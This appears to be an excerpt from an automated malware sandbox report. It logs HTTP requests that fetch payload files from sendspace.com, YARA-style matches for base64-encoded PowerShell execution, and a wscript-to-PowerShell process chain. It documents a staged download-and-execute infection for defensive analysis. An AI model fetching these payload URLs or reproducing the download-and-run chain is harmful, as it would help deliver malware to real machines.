Source: global traffic |
HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/ppxodm HTTP/1.1
Host: www.sendspace.com |
Source: global traffic |
HTTP traffic detected: GET /dlpro/ab0d4132c177b6677608eb6f24e68e83/664f6df0/ppxodm/Turde.jpb HTTP/1.1
Host: fs03n5.sendspace.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/8gikly HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/3a2e390c959a9f37c8f0aa7f6af4be82/664f6e17/8gikly/WySjCpJeTvpFxCC108.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: fs13n3.sendspace.com
Connection: Keep-Alive
Cookie: SID=7cbl3ctvlcko76s2guour4vig6 |
Source: amsi64_7772.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_5824.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 5824, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |